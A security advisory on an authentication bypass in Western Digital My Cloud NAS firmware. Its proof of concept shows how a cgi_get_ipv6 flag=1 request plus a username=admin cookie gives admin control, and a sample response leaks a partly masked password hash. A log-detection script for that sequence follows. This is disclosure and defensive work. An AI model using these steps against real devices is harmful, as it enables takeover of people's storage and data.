Authentication bypass vulnerability in Western Digital My Cloud allows escalation to admin privileges
It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the My Cloud device.
This vulnerability was successfully verified on a Western Digital My Cloud model WDBCTL0020HWT running firmware version 2.21.126. This issue is not limited to the model that was used to find this vulnerability since most of the products in the My Cloud series share the same (vulnerable) code.
Fixed in 2.30.165 (04/12/2017)
Western Digital My Cloud is a low-cost entry-level network-attached storage device. It was discovered that the Western Digital My Cloud is affected by an authentication bypass vulnerability that allows an unauthenticated user to create an admin session that is tied to his/her IP address. By exploiting this issue an unauthenticated attacker can run commands that would normally require admin privileges and gain complete control of the My Cloud device.
The issue was discovered while reverse engineering the CGI binaries to look for security issues.
The network_mgr.cgi CGI module contains a command called cgi_get_ipv6 that starts an admin session that is tied to the IP address of the user making the request when the command is called with the parameter flag=1. Subsequent invocations of commands that would normally require admin privileges are now authorized when an attacker sets the username=admin cookie.
Proof of concept
Establishing an admin session that is tied to the IP of the requester:
POST /cgi-bin/network_mgr.cgi HTTP/1.1
Call an endpoint (e.g., cgi_get_ssh_pw_status) that requires admin privileges and authenticate as admin by adding the cookie username=admin:
POST /cgi-bin/system_mgr.cgi HTTP/1.1
Response from the Western Digital MyCloud:
HTTP/1.1 200 OK
Date: Sat, 01 Jan 2000 00:18:27 GMT
<?xml version="1.0" encoding="UTF-8"?><ssh><info>sshd:$1$$CoERg7ynjYLsj2j4****.:14746:0:99999:7:::
- 10 April 2017: Discovered vulnerability.
- 12 April 2017: Reported to Western Digital customer support.
- 12 April 2017: Response from Western Digital that the vulnerability has been forwarded to their vulnerability assessment team.
- 12 April 2017: Fix released in firmware 2.30.165. However, no response from Western Digital.
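For devices that cannot be upgraded to the fixed firmware immediately, the two-request sequence described above can be looked for in request logs captured in front of the device. The following is an added detection sketch, not code from the advisory or from Western Digital; the event schema, the sample events, the function names and the one-hour correlation window are all assumptions made for the example.

```python
from datetime import datetime, timedelta

# Constructed, normalised request events. The field names are this example's
# own schema (an assumption), not the device's request or log format.
SAMPLE_EVENTS = """\
2017-04-10T09:00:01 src=192.0.2.10 cgi=network_mgr.cgi command=cgi_get_ipv6 flag=1 cookie_user=-
2017-04-10T09:00:05 src=192.0.2.10 cgi=system_mgr.cgi command=cgi_get_ssh_pw_status flag=- cookie_user=admin
2017-04-10T09:02:00 src=198.51.100.7 cgi=network_mgr.cgi command=cgi_get_ipv6 flag=0 cookie_user=-
2017-04-10T09:02:10 src=198.51.100.7 cgi=system_mgr.cgi command=cgi_get_ssh_pw_status flag=- cookie_user=admin
2017-04-10T09:05:00 src=203.0.113.4 cgi=network_mgr.cgi command=cgi_get_ipv6 flag=1 cookie_user=-
2017-04-10T11:30:00 src=203.0.113.4 cgi=system_mgr.cgi command=cgi_get_ssh_pw_status flag=- cookie_user=admin
"""

def parse_event(line):
    """Split '<ISO time> key=value ...' into a dict with a datetime under 'ts'."""
    ts, *pairs = line.split()
    event = dict(pair.split("=", 1) for pair in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    return event

def find_bypass_sequences(text, window=timedelta(hours=1)):
    """Report clients that called cgi_get_ipv6 with flag=1 and then sent a
    username=admin cookie within `window`.

    The advisory does not say how long the IP-bound session lasts, so the
    window is a tuning assumption; widen it to catch slow follow-ups.
    Returns a list of (client ip, follow-up command, delay) tuples.
    """
    primed = {}     # client ip -> time of the session-creating request
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        src = ev["src"]
        if (ev["cgi"] == "network_mgr.cgi" and ev["command"] == "cgi_get_ipv6"
                and ev["flag"] == "1"):
            primed[src] = ev["ts"]
        elif ev["cookie_user"] == "admin" and src in primed:
            delay = ev["ts"] - primed[src]
            if delay <= window:
                findings.append((src, ev["command"], delay))
    return findings

if __name__ == "__main__":
    for src, command, delay in find_bypass_sequences(SAMPLE_EVENTS):
        print(f"ALERT {src}: {command} with admin cookie {delay} after cgi_get_ipv6 flag=1")
```

A hit is only a lead: confirm the firmware version against the fixed release (2.30.165) and review what the flagged client did afterwards.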